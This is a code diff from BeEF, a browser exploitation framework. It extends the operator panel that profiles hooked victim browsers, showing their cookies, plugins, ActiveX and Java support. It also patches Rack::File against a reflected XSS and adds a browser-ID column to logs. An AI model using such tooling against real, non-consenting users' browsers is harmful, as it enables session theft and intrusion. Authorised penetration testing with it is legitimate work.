@@ -72,15 +72,15 @@ module BeEF
details = BeEF::Core::Models::BrowserDetails
{
'id' => hb.id,
'session' => hb.session,
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'SystemPlatform'),
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s,
'id' => hb.id,
'session' => hb.session,
'name' => details.get(hb.session, 'BrowserName'),
'version' => details.get(hb.session, 'BrowserVersion'),
'os' => details.get(hb.session, 'OsName'),
'platform' => details.get(hb.session, 'BrowserPlatform'),
'ip' => hb.ip,
'domain' => details.get(hb.session, 'HostName'),
'port' => hb.port.to_s,
'page_uri' => details.get(hb.session, 'PageURI')
}
end
@@ -88,4 +88,4 @@ module BeEF
end
end
end
end
end

3
core/ruby.rb
View File

@@ -7,6 +7,9 @@
# @note Patching Ruby Security
require 'core/ruby/security'
# @note Patching Rack File class to prevent a potential XSS
require 'core/ruby/file.rb'
# @note Patching Ruby
require 'core/ruby/module'
require 'core/ruby/object'

44
core/ruby/file.rb Normal file
View File

@@ -0,0 +1,44 @@
require 'time'
require 'rack/utils'
require 'rack/mime'
module Rack
class File
def _call(env)
unless ALLOWED_VERBS.include? env["REQUEST_METHOD"]
return fail(405, "Method Not Allowed")
end
@path_info = Utils.unescape(env["PATH_INFO"])
parts = @path_info.split SEPS
parts.inject(0) do |depth, part|
case part
when '', '.'
depth
when '..'
return fail(404, "Not Found") if depth - 1 < 0
depth - 1
else
depth + 1
end
end
@path = F.join(@root, *parts)
available = begin
F.file?(@path) && F.readable?(@path)
rescue SystemCallError
false
end
if available
serving(env)
else
# this is the patched line. No need to reflect the URI path, potential XSS
# exploitable if you can bypass the Content-type: text/plain (IE MHTML and tricks like that)
fail(404, "File not found")
end
end
end
end

3
extensions/admin_ui/controllers/logs/logs.rb
View File

@@ -63,7 +63,8 @@ class Logs < BeEF::Extension::AdminUI::HttpController
'id' => log.id.to_i,
'date' => log.date.to_s,
'event' => log.event.to_s,
'type' => log.type.to_s
'type' => log.type.to_s,
'hooked_browser_id' => log.hooked_browser_id.to_i
}
end

561
extensions/admin_ui/controllers/modules/modules.rb
View File

@@ -7,14 +7,14 @@ module BeEF
module Extension
module AdminUI
module Controllers
#
#
#
class Modules < BeEF::Extension::AdminUI::HttpController
BD = BeEF::Core::Models::BrowserDetails
def initialize
super({
'paths' => {
@@ -31,7 +31,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
'/commandmodule/reexecute' => method(:reexecute_command_module)
}
})
@session = BeEF::Extension::AdminUI::Session.instance
end
@@ -45,11 +45,11 @@ class Modules < BeEF::Extension::AdminUI::HttpController
'token' => BeEF::Core::Configuration.instance.get("beef.api_token")
}.to_json
end
# Returns a JSON array containing the summary for a selected zombie.
def select_zombie_summary
# get the zombie
# get the zombie
zombie_session = @params['zombie_session'] || nil
(print_error "Zombie session is nil";return) if zombie_session.nil?
zombie = BeEF::Core::Models::HookedBrowser.first(:session => zombie_session)
@@ -57,390 +57,93 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# init the summary grid
summary_grid_hash = {
'success' => 'true',
'success' => 'true',
'results' => []
}
# set and add the return values for the page title
page_title = BD.get(zombie_session, 'PageTitle')
if not page_title.nil?
encoded_page_title = CGI.escapeHTML(page_title)
encoded_page_title_hash = { 'Page Title' => encoded_page_title }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_page_title_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
# zombie properties
# in the form of: category, UI label, value
zombie_properties = [
# Browser
['Browser', 'Browser Name', 'BrowserName'],
['Browser', 'Browser Version', 'BrowserVersion'],
['Browser', 'Browser UA String', 'BrowserReportedName'],
['Browser', 'Browser Platform', 'BrowserPlatform'],
['Browser', 'Browser Plugins', 'BrowserPlugins'],
['Browser', 'Window Size', 'WindowSize'],
# Browser Components
['Browser Components', 'Flash', 'HasFlash'],
['Browser Components', 'Java', 'JavaEnabled'],
['Browser Components', 'VBScript', 'VBScriptEnabled'],
['Browser Components', 'PhoneGap', 'HasPhonegap'],
['Browser Components', 'Google Gears', 'HasGoogleGears'],
['Browser Components', 'Silverlight', 'HasSilverlight'],
['Browser Components', 'Web Sockets', 'HasWebSocket'],
['Browser Components', 'QuickTime', 'HasQuickTime'],
['Browser Components', 'RealPlayer', 'HasRealPlayer'],
['Browser Components', 'Windows Media Player','HasWMP'],
['Browser Components', 'VLC', 'HasVLC'],
['Browser Components', 'Foxit Reader', 'HasFoxit'],
['Browser Components', 'ActiveX', 'HasActiveX'],
['Browser Components', 'Session Cookies', 'hasSessionCookies'],
['Browser Components', 'Persistent Cookies', 'hasPersistentCookies'],
# Hooked Page
['Hooked Page', 'Page Title', 'PageTitle'],
['Hooked Page', 'Page URI', 'PageURI'],
['Hooked Page', 'Page Referrer', 'PageReferrer'],
['Hooked Page', 'Host Name/IP', 'HostName'],
['Hooked Page', 'Cookies', 'Cookies'],
# Host
['Host', 'Date', 'DateStamp'],
['Host', 'Operating System', 'OsName'],
['Host', 'Hardware', 'Hardware'],
['Host', 'CPU', 'CPU'],
['Host', 'Screen Size', 'ScreenSize'],
['Host', 'Touch Screen', 'TouchEnabled']
]
# set and add the return values for each browser property
# in the form of: category, UI label, value
zombie_properties.each do |p|
case p[2]
when "BrowserName"
data = BeEF::Core::Constants::Browsers.friendly_name(BD.get(zombie_session, p[2]))
when "ScreenSize"
screen_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
height = screen_size_hash['height']
cdepth = screen_size_hash['colordepth']
data = "Width: #{width}, Height: #{height}, Colour Depth: #{cdepth}"
when "WindowSize"
window_size_hash = JSON.parse(BD.get(zombie_session, p[2]).gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = window_size_hash['width']
height = window_size_hash['height']
data = "Width: #{width}, Height: #{height}"
else
data = BD.get(zombie_session, p[2])
end
# add property to summary hash
if not data.nil?
summary_grid_hash['results'].push({
'category' => p[0],
'data' => { p[1] => CGI.escapeHTML("#{data}") },
'from' => 'Initialization'
})
end
end
# set and add the return values for the page uri
page_uri = BD.get(zombie_session, 'PageURI')
if not page_uri.nil?
encoded_page_uri = CGI.escapeHTML(page_uri)
encoded_page_uri_hash = { 'Page URI' => encoded_page_uri }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_page_uri_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the page referrer
page_referrer = BD.get(zombie_session, 'PageReferrer')
if not page_referrer.nil?
encoded_page_referrer = CGI.escapeHTML(page_referrer)
encoded_page_referrer_hash = { 'Page Referrer' => encoded_page_referrer }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_page_referrer_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the host name
host_name = BD.get(zombie_session, 'HostName')
if not host_name.nil?
encoded_host_name = CGI.escapeHTML(host_name)
encoded_host_name_hash = { 'Hostname/IP' => encoded_host_name }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_host_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the date stamp
date_stamp = BD.get(zombie_session, 'DateStamp')
if not date_stamp.nil?
encoded_date_stamp = CGI.escapeHTML(date_stamp)
encoded_date_stamp_hash = { 'Date' => encoded_date_stamp }
page_name_row = {
'category' => 'Host',
'data' => encoded_date_stamp_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the os name
os_name = BD.get(zombie_session, 'OsName')
if not os_name.nil?
encoded_os_name = CGI.escapeHTML(os_name)
encoded_os_name_hash = { 'OS Name' => encoded_os_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_os_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the hardware name
hw_name = BD.get(zombie_session, 'Hardware')
if not hw_name.nil?
encoded_hw_name = CGI.escapeHTML(hw_name)
encoded_hw_name_hash = { 'Hardware' => encoded_hw_name }
page_name_row = {
'category' => 'Host',
'data' => encoded_hw_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for the browser name
browser_name = BD.get(zombie_session, 'BrowserName')
if not browser_name.nil?
friendly_browser_name = BeEF::Core::Constants::Browsers.friendly_name(browser_name)
browser_name_hash = { 'Browser Name' => friendly_browser_name }
browser_name_row = {
'category' => 'Browser',
'data' => browser_name_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(browser_name_row) # add the row
end
# set and add the return values for the browser version
browser_version = BD.get(zombie_session, 'BrowserVersion')
if not browser_version.nil?
encoded_browser_version = CGI.escapeHTML(browser_version)
browser_version_hash = { 'Browser Version' => encoded_browser_version }
browser_version_row = {
'category' => 'Browser',
'data' => browser_version_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(browser_version_row) # add the row
end
# set and add the return values for the browser ua string
browser_uastring = BD.get(zombie_session, 'BrowserReportedName')
if not browser_uastring.nil?
browser_uastring_hash = { 'Browser UA String' => browser_uastring }
browser_uastring_row = {
'category' => 'Browser',
'data' => browser_uastring_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(browser_uastring_row) # add the row
end
# set and add the list of cookies
cookies = BD.get(zombie_session, 'Cookies')
if not cookies.nil? and not cookies.empty?
encoded_cookies = CGI.escapeHTML(cookies)
encoded_cookies_hash = { 'Cookies' => encoded_cookies }
page_name_row = {
'category' => 'Hooked Page',
'data' => encoded_cookies_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the list of plugins installed in the browser
browser_plugins = BD.get(zombie_session, 'BrowserPlugins')
if not browser_plugins.nil? and not browser_plugins.empty?
encoded_browser_plugins = CGI.escapeHTML(browser_plugins)
encoded_browser_plugins_hash = { 'Browser Plugins' => encoded_browser_plugins }
page_name_row = {
'category' => 'Browser',
'data' => encoded_browser_plugins_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the System Platform
system_platform = BD.get(zombie_session, 'SystemPlatform')
if not system_platform.nil?
encoded_system_platform = CGI.escapeHTML(system_platform)
encoded_system_platform_hash = { 'System Platform' => encoded_system_platform }
page_name_row = {
'category' => 'Host',
'data' => encoded_system_platform_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the zombie screen size and color depth
screen_size = BD.get(zombie_session, 'ScreenSize')
if not screen_size.nil?
screen_size_hash = JSON.parse(screen_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = screen_size_hash['width']
(print_error "width is wrong type";return) if not width.is_a?(Fixnum)
height = screen_size_hash['height']
(print_error "height is wrong type";return) if not height.is_a?(Fixnum)
colordepth = screen_size_hash['colordepth']
(print_error "colordepth is wrong type";return) if not colordepth.is_a?(Fixnum)
# construct the string to be displayed in the details tab
encoded_screen_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s + ", Colour Depth: " + colordepth.to_s)
encoded_screen_size_hash = { 'Screen Size' => encoded_screen_size }
page_name_row = {
'category' => 'Host',
'data' => encoded_screen_size_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the zombie browser window size
window_size = BD.get(zombie_session, 'WindowSize')
if not window_size.nil?
window_size_hash = JSON.parse(window_size.gsub(/\"\=\>/, '":')) # tidy up the string for JSON
width = window_size_hash['width']
(print_error "width is wrong type";return) if not width.is_a?(Fixnum)
height = window_size_hash['height']
(print_error "height is wrong type";return) if not height.is_a?(Fixnum)
# construct the string to be displayed in the details tab
encoded_window_size = CGI.escapeHTML("Width: "+width.to_s + ", Height: " + height.to_s)
encoded_window_size_hash = { 'Window Size' => encoded_window_size }
page_name_row = {
'category' => 'Browser',
'data' => encoded_window_size_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for JavaEnabled
java_enabled = BD.get(zombie_session, 'JavaEnabled')
if not java_enabled.nil?
encoded_java_enabled = CGI.escapeHTML(java_enabled)
encoded_java_enabled_hash = { 'Java Enabled' => encoded_java_enabled }
page_name_row = {
'category' => 'Browser',
'data' => encoded_java_enabled_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for VBScriptEnabled
vbscript_enabled = BD.get(zombie_session, 'VBScriptEnabled')
if not vbscript_enabled.nil?
encoded_vbscript_enabled = CGI.escapeHTML(vbscript_enabled)
encoded_vbscript_enabled_hash = { 'VBScript Enabled' => encoded_vbscript_enabled }
page_name_row = {
'category' => 'Browser',
'data' => encoded_vbscript_enabled_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasFlash
has_flash = BD.get(zombie_session, 'HasFlash')
if not has_flash.nil?
encoded_has_flash = CGI.escapeHTML(has_flash)
encoded_has_flash_hash = { 'Has Flash' => encoded_has_flash }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_flash_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for hasPhonegap
has_phonegap = BD.get(zombie_session, 'hasPhonegap')
if not has_phonegap.nil?
encoded_has_phonegap = CGI.escapeHTML(has_phonegap)
encoded_has_phonegap_hash = { 'Has Phonegap' => encoded_has_phonegap }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_phonegap_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasGoogleGears
has_googlegears = BD.get(zombie_session, 'HasGoogleGears')
if not has_googlegears.nil?
encoded_has_googlegears = CGI.escapeHTML(has_googlegears)
encoded_has_googlegears_hash = { 'Has GoogleGears' => encoded_has_googlegears }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_googlegears_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasWebSocket
has_web_socket = BD.get(zombie_session, 'HasWebSocket')
if not has_web_socket.nil?
encoded_has_web_socket = CGI.escapeHTML(has_web_socket)
encoded_has_web_socket_hash = { 'Has WebSockets' => encoded_has_web_socket }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_web_socket_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the yes|no value for HasActiveX
has_activex = BD.get(zombie_session, 'HasActiveX')
if not has_activex.nil?
encoded_has_activex = CGI.escapeHTML(has_activex)
encoded_has_activex_hash = { 'Has ActiveX' => encoded_has_activex }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_activex_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for hasSessionCookies
has_session_cookies = BD.get(zombie_session, 'hasSessionCookies')
if not has_session_cookies.nil?
encoded_has_session_cookies = CGI.escapeHTML(has_session_cookies)
encoded_has_session_cookies_hash = { 'Session Cookies' => encoded_has_session_cookies }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_session_cookies_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
# set and add the return values for hasPersistentCookies
has_persistent_cookies = BD.get(zombie_session, 'hasPersistentCookies')
if not has_persistent_cookies.nil?
encoded_has_persistent_cookies = CGI.escapeHTML(has_persistent_cookies)
encoded_has_persistent_cookies_hash = { 'Persistent Cookies' => encoded_has_persistent_cookies }
page_name_row = {
'category' => 'Browser',
'data' => encoded_has_persistent_cookies_hash,
'from' => 'Initialization'
}
summary_grid_hash['results'].push(page_name_row) # add the row
end
@body = summary_grid_hash.to_json
@body = summary_grid_hash.to_json
end
# Returns the list of all command_modules in a JSON format
def select_all_command_modules
@body = command_modules2json(BeEF::Modules.get_enabled.keys)
@@ -562,10 +265,10 @@ class Modules < BeEF::Extension::AdminUI::HttpController
#Recursive function to sort all the parent's children
def sort_recursive_tree(parent)
# sort the children nodes by status and name
parent.each {|x|
parent.each {|x|
#print_info "Sorting: " + x['children'].to_s
if x.is_a?(Hash) and x.has_key?('children')
x['children'] = x['children'].sort_by {|a|
x['children'] = x['children'].sort_by {|a|
fldr = a['cls'] ? a['cls'] : 'zzzzz'
"#{fldr}#{a['status']}#{a['text']}"
}
@@ -649,20 +352,20 @@ class Modules < BeEF::Extension::AdminUI::HttpController
update_command_module_tree(tree, dyn_mod_category, command_module_icon_path, command_module_status, command_mod_name,dyn_mod.id)
}
end
# sort the parent array nodes
# sort the parent array nodes
tree.sort! {|a,b| a['text'] <=> b['text']}
sort_recursive_tree(tree)
retitle_recursive_tree(tree)
# return a JSON array of hashes
@body = tree.to_json
end
# Returns the inputs definition of an command_module.
def select_command_module
command_module_id = @params['command_module_id'] || nil
@@ -677,7 +380,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
@body = command_modules2json([key])
end
end
# Returns the list of commands for an command_module
def select_command_module_commands
commands = []
@@ -692,32 +395,32 @@ class Modules < BeEF::Extension::AdminUI::HttpController
nonce = @params['nonce'] || nil
(print_error "nonce is nil";return) if nonce.nil?
(print_error "nonce incorrect";return) if @session.get_nonce != nonce
# get the browser id
zombie = Z.first(:session => zombie_session)
(print_error "Zombie is nil";return) if zombie.nil?
zombie_id = zombie.id
(print_error "Zombie id is nil";return) if zombie_id.nil?
C.all(:command_module_id => command_module_id, :hooked_browser_id => zombie_id).each do |command|
commands.push({
'id' => i,
'object_id' => command.id,
'creationdate' => Time.at(command.creationdate.to_i).strftime("%Y-%m-%d %H:%M").to_s,
'id' => i,
'object_id' => command.id,
'creationdate' => Time.at(command.creationdate.to_i).strftime("%Y-%m-%d %H:%M").to_s,
'label' => command.label
})
i+=1
end
@body = {
'success' => 'true',
'success' => 'true',
'commands' => commands}.to_json
end
# Attaches an command_module to a zombie.
def attach_command_module
definition = {}
# get params
@@ -729,8 +432,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
nonce = @params['nonce'] || nil
(print_error "nonce is nil";return) if nonce.nil?
(print_error "nonce incorrect";return) if @session.get_nonce != nonce
@params.keys.each {|param|
@params.keys.each {|param|
(print_error "invalid key param string";return) if not BeEF::Filters.has_valid_param_chars?(param)
(print_error "first char is num";return) if BeEF::Filters.first_char_is_num?(param)
definition[param[4..-1]] = params[param]
@@ -749,10 +452,10 @@ class Modules < BeEF::Extension::AdminUI::HttpController
exec_results = BeEF::Module.execute(mod_key, zombie_session, def2)
@body = (exec_results != nil) ? '{success: true}' : '{success: false}'
end
# Re-execute an command_module to a zombie.
def reexecute_command_module
# get params
command_id = @params['command_id'] || nil
(print_error "Command id is nil";return) if command_id.nil?
@@ -762,15 +465,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
nonce = @params['nonce'] || nil
(print_error "nonce is nil";return) if nonce.nil?
(print_error "nonce incorrect";return) if @session.get_nonce != nonce
command.instructions_sent = false
command.save
@body = '{success : true}'
end
def attach_dynamic_command_module
definition = {}
# get params
@@ -782,8 +485,8 @@ class Modules < BeEF::Extension::AdminUI::HttpController
nonce = @params['nonce'] || nil
(print_error "nonce is nil";return) if nonce.nil?
(print_error "nonce incorrect";return) if @session.get_nonce != nonce
@params.keys.each {|param|
@params.keys.each {|param|
(print_error "invalid key param string";return) if not BeEF::Filters.has_valid_param_chars?(param)
(print_error "first char is num";return) if BeEF::Filters.first_char_is_num?(param)
definition[param[4..-1]] = params[param]
@@ -825,11 +528,11 @@ class Modules < BeEF::Extension::AdminUI::HttpController
end
# Returns the results of a command
def select_command_results
results = []
# get params
command_id = @params['command_id']|| nil
(print_error "Command id is nil";return) if command_id.nil?
@@ -839,24 +542,24 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# get command_module
command_module = BeEF::Core::Models::CommandModule.first(:id => command.command_module_id)
(print_error "command_module is nil";return) if command_module.nil?
resultsdb = BeEF::Core::Models::Result.all(:command_id => command_id)
(print_error "Command id result is nil";return) if resultsdb.nil?
resultsdb.each{ |result| results.push({'date' => result.date, 'data' => JSON.parse(result.data)}) }
@body = {
'success' => 'true',
'success' => 'true',
'command_module_name' => command_module.name,
'command_module_id' => command_module.id,
'results' => results}.to_json
end
# Returns the definition of a command.
# In other words it returns the command that was used to command_module a zombie.
def select_command
# get params
command_id = @params['command_id'] || nil
(print_error "Command id is nil";return) if command_id.nil?
@@ -873,9 +576,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController
command_module_name = command_module.name
e = BeEF::Core::Command.const_get(command_module_name.capitalize).new(command_module_name)
end
@body = {
'success' => 'true',
'success' => 'true',
'command_module_name' => command_module_name,
'command_module_id' => command_module.id,
'data' => BeEF::Module.get_options(command_module_name),
@@ -883,9 +586,9 @@ class Modules < BeEF::Extension::AdminUI::HttpController
}.to_json
end
private
# Takes a list of command_modules and returns them as a JSON array
def command_modules2json(command_modules)
command_modules_json = {}
@@ -901,7 +604,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
command_modules_json[i] = h
i += 1
end
if not command_modules_json.empty?
return {'success' => 'true', 'command_modules' => command_modules_json}.to_json
else
@@ -912,15 +615,15 @@ class Modules < BeEF::Extension::AdminUI::HttpController
# return the input requred for the module in JSON format
def dynamic_modules2json(id)
command_modules_json = {}
mod = BeEF::Core::Models::CommandModule.first(:id => id)
# if the module id is not in the database return false
return {'success' => 'false'}.to_json if(not mod)
# the path will equal Dynamic/<type> and this will get just the type
dynamic_type = mod.path.split("/").last
e = BeEF::Modules::Commands.const_get(dynamic_type.capitalize).new
e.update_info(mod.id)
e.update_data()
@@ -947,7 +650,7 @@ class Modules < BeEF::Extension::AdminUI::HttpController
return {'success' => 'true', 'command_modules' => payload_options_json}.to_json
end
end
end

60
extensions/admin_ui/controllers/panel/panel.rb
View File

@@ -76,37 +76,51 @@ module BeEF
# create a hash of simple hooked browser details
def get_simple_hooked_browser_hash(hooked_browser)
browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
browser_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserName')
browser_version = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'BrowserVersion')
browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
browser_icon = BeEF::Core::Models::BrowserDetails.browser_icon(hooked_browser.session)
os_icon = BeEF::Core::Models::BrowserDetails.os_icon(hooked_browser.session)
os_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'OsName')
hw_icon = BeEF::Core::Models::BrowserDetails.hw_icon(hooked_browser.session)
hw_name = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'Hardware')
domain = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HostName')
has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
has_activex = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
has_quicktime = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
has_realplayer = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
has_wmp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWMP')
has_vlc = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
has_foxit = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFoxit')
date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
return {
'session' => hooked_browser.session,
'ip' => hooked_browser.ip,
'domain' => domain,
'port' => hooked_browser.port.to_s,
'browser_name' => browser_name,
'session' => hooked_browser.session,
'ip' => hooked_browser.ip,
'domain' => domain,
'port' => hooked_browser.port.to_s,
'browser_name' => browser_name,
'browser_version' => browser_version,
'browser_icon' => browser_icon,
'os_icon' => os_icon,
'os_name' => os_name,
'hw_icon' => hw_icon,
'hw_name' => hw_name,
'has_flash' => has_flash,
'browser_icon' => browser_icon,
'os_icon' => os_icon,
'os_name' => os_name,
'hw_icon' => hw_icon,
'hw_name' => hw_name,
'has_flash' => has_flash,
'has_web_sockets' => has_web_sockets,
'has_googlegears' => has_googlegears,
'has_java' => has_java,
'date_stamp' => date_stamp
'has_java' => has_java,
'has_activex' => has_activex,
'has_silverlight' => has_silverlight,
'has_quicktime' => has_quicktime,
'has_wmp' => has_wmp,
'has_vlc' => has_vlc,
'has_foxit' => has_foxit,
'has_realplayer' => has_realplayer,
'date_stamp' => date_stamp
}
end

BIN
extensions/admin_ui/media/images/help/forge.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 5.6 KiB

BIN
extensions/admin_ui/media/images/help/history.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 4.6 KiB

BIN
extensions/admin_ui/media/images/help/proxy.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 9.4 KiB

BIN
extensions/admin_ui/media/images/icons/laptop.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 56 KiB

BIN
extensions/admin_ui/media/images/icons/vm.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 3.2 KiB

17
extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
View File

@@ -18,10 +18,10 @@ DataGrid = function(url, page, base) {
storeId: 'myStore',
baseParams: this.base,
idProperty: 'id',
fields: ['id','type','event','date'],
fields: ['id','type','event','date','hooked_browser_id'],
totalProperty: 'count',
remoteSort: false,
sortInfo: {field: "date", direction: "DESC"}
sortInfo: {field: "id", direction: "DESC"}
});
this.bbar = new Ext.PagingToolbar({
@@ -35,9 +35,10 @@ DataGrid = function(url, page, base) {
this.columns = [{
id: 'log-id',
header: 'Id',
hidden: true,
hidden: false,
dataIndex: 'id',
sortable: false
sortable: true,
width: 20
}, {
id: 'log-type',
header: "Type",
@@ -61,6 +62,12 @@ DataGrid = function(url, page, base) {
width: 80,
renderer: $jEncoder.encoder.encodeForHTML(this.formatDate),
sortable:true
}, {
id: 'log-browser',
header: "Browser ID",
dataIndex: 'hooked_browser_id',
sortable: true,
width: 35
}];
DataGrid.superclass.constructor.call(this, {
@@ -78,7 +85,7 @@ DataGrid = function(url, page, base) {
listeners: {
afterrender: function(datagrid) {
datagrid.store.reload({params:{start:0, limit:datagrid.page, sort:"date", dir:"DESC"}});
datagrid.store.reload({params:{start:0, limit:datagrid.page, sort:"id", dir:"DESC"}});
}
}
});

40
extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
View File

@@ -5,10 +5,10 @@
//
var ZombiesMgr = function(zombies_tree_lists) {
//save the list of trees in the object
this.zombies_tree_lists = zombies_tree_lists;
// this is a helper class to create a zombie object from a JSON hash index
this.zombieFactory = function(index, zombie_array){
@@ -26,7 +26,14 @@ var ZombiesMgr = function(zombies_tree_lists) {
var has_flash = zombie_array[index]["has_flash"];
var has_web_sockets = zombie_array[index]["has_web_sockets"];
var has_googlegears = zombie_array[index]["has_googlegears"];
var has_java = zombie_array[index]["has_java"];
var has_java = zombie_array[index]["has_java"];
var has_activex = zombie_array[index]["has_activex"];
var has_wmp = zombie_array[index]["has_wmp"];
var has_vlc = zombie_array[index]["has_vlc"];
var has_foxit = zombie_array[index]["has_foxit"];
var has_silverlight = zombie_array[index]["has_silverlight"];
var has_quicktime = zombie_array[index]["has_quicktime"];
var has_realplayer = zombie_array[index]["has_realplayer"];
var date_stamp = zombie_array[index]["date_stamp"];
text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
@@ -42,9 +49,16 @@ var ZombiesMgr = function(zombies_tree_lists) {
balloon_text+= "<br/>Flash: " + has_flash;
balloon_text+= "<br/>Java: " + has_java;
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>ActiveX: " + has_activex;
balloon_text+= "<br/>Silverlight: " + has_silverlight;
balloon_text+= "<br/>QuickTime: " + has_quicktime;
balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp;
balloon_text+= "<br/>VLC: " + has_vlc;
balloon_text+= "<br/>Foxit: " + has_foxit;
balloon_text+= "<br/>RealPlayer: " + has_realplayer;
balloon_text+= "<br/>Google Gears: " + has_googlegears;
balloon_text+= "<br/>Date: " + date_stamp;
var new_zombie = {
'id' : index,
'ip' : ip,
@@ -55,10 +69,10 @@ var ZombiesMgr = function(zombies_tree_lists) {
